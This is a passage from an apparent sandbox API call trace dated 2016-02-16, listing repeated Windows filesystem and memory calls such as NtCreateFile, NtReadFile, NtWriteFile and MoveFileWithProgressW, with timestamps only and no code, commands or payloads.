{"category": "filesystem", "timestamp": "2016-02-16 17:41:49,043", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,043", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,043", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,043", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,043", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,043", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,043", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,043", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,053", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,053", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,053", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,053", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,053", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,053", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,053", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,053", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,053", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,053", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,063", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,063", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,063", "api": "FindFirstFileExW"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:49,063", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,063", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,063", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,063", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,063", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,063", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,063", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,063", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,073", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,073", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,073", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,073", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,073", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,073", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,073", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,073", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,073", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,083", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,083", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,083", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,083", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:49,083", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,083", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,083", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,083", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,083", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,083", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,083", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,093", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,093", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,093", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,093", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,093", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,093", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,093", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,093", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,103", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,103", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,103", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,103", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,103", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,103", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:49,103", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,103", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,103", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,113", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,113", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,113", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,113", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,113", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,113", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,113", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,113", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,113", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,113", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,123", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,123", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,123", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,123", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,123", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,123", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,123", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,123", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,123", "api": 
"NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,133", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,133", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,133", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,133", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,133", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,133", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,133", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,133", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,133", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,143", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,143", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,143", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,143", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,143", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,143", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,143", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,143", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,143", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,143", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,143", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,153", "api": "NtReadFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:49,153", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,153", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,153", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,153", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,153", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,153", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,153", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,153", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,153", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,153", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,163", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,163", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,163", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,163", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,163", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,163", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,163", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,163", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,163", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,163", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,163", "api": "NtFreeVirtualMemory"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:49,163", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,173", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,173", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,173", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,173", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,173", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,173", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,173", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,173", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,173", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,183", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,183", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,183", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,183", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,183", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,183", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,183", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,183", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,183", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,183", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,183", "api": "NtWriteFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:49,183", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,193", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,193", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,193", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,193", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,193", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,193", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,193", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,193", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,193", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,193", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,193", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,193", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,203", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,203", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,203", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,203", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,203", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,203", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,203", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,203", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:49,203", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,203", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,203", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,203", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,203", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,213", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,213", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,213", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,213", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,213", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,213", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,213", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,213", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,213", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,213", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,223", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,223", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,223", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,223", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,223", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,223", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,233", 
"api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,233", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,233", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,233", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,233", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,233", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,233", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,243", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,243", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,243", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,243", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,243", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,243", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,243", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,243", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,243", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,243", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,243", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,253", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,253", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,253", "api": 
"NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,253", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,253", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,253", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,253", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,253", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,253", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,263", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,263", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,263", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,263", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,263", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,263", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,263", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,263", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,263", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,273", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,273", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,273", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,273", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,273", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,273", "api": "NtWriteFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:49,273", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,273", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,273", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,283", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,283", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,283", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,283", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,283", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,283", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,283", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,283", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,283", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,293", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,293", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,293", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,293", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,293", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,293", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,293", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,293", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,303", "api": "NtReadFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:49,303", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,303", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,303", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,303", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,303", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,303", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,303", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,313", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,313", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,313", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,323", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,323", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,323", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,323", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,323", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,323", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,323", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,323", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,333", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,333", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,333", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:49,333", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,333", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,333", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,333", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,333", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,343", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,343", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,343", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,343", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,343", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,343", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,353", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,353", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,353", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,353", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,353", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,353", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,353", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,353", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,363", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,363", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:49,363", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,363", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,363", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,363", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,363", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,363", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,373", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,373", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,373", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,373", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,373", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,373", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,373", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,373", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,373", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,373", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,383", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,383", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:49,383", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,383", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,383", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:49,383", 
